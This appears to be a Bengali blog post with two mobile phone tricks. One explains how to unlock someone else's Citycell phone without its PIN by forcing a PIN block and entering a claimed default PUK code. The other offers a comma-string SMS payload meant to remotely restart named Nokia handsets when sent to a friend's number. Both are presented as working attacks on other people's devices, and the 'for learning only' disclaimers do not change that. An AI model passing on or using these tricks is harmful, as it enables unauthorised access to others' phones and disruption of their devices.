কারো সিটিসেল ফোন যদি পিন দিযে লক করা থাকে তাহলে আপনি পাসওয়ার্ড না জেনেও খুলতে পারবেন। এজন্য আপনি ভুল কযেকটি পাসওয়ার্ড দিন পিন ব্লক হয়ে গেলে পাক কোড চাইবে। আর বেশীর ভাগ সিটিসেল ফোনে অন্তত আমি যতগুলো দেখেছি এখন পযর্ন্ত সবগুলোর পাক কোড ১২৩৪৫৬৭৮। এবার এই পাক কোড দিয়ে আর যথারীতি পিন ১২৩৪ দিয়ে ফোনটি আনলক করুন। এভাবে সিটিসেল মোবাইলের পিন লক থাকলেও না জেনেই সহজে খুলতে পারেন।
দয়া করে কার ক্ষতি করবেন না।
এটা শুধু শিখার জন্য। please আইটার ব্যাড ইয়ুস করবেন না।

send sms to your friends and restart her mobile

0 comments
আসুন শিখে ফেলি কিভাবে আপনি SMS পাঠিয়ে আপনার বন্ধুদের মোবাইল রিস্ট্রাট করে দিতে পারেন। এটা খুব। মজার একটা বিষয় শুধু মাত্র নিচের কোড টি SMS করে পাঠিয়ে দিলেই ফোন রিস্ট্রাট হবে। এই জিনিসটা শুধু  Nokia- 1110,1110i,1112,1100,2100 মডেলের হজ্যান্ডসেট গুলো রিস্ট্রাট দিতে পারে।
কোড
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
শুধু  উপরের কোডটি মেসেজ বক্সে টাইপ করে সেন্ড করে দিন আপনার Nokia- 1110, 1110i, 1112, 1100, 2100 মডেলের নোকিয়া সেটের নাম্বারের।
আপনার মোবাইল থেকে এসএমএস পাঠেতে টাকা লাগবে, তাই আমি আপনাদের শিখিয়ে দিচ্ছি  কিভাবে নেট থেকে ফ্রী এসএমএস পাঠানো যায়।
http://uthsms.net/?on=sms

সবাই ভাল থাকবেন…

My dear blog reader please shere this blog with your best friend

X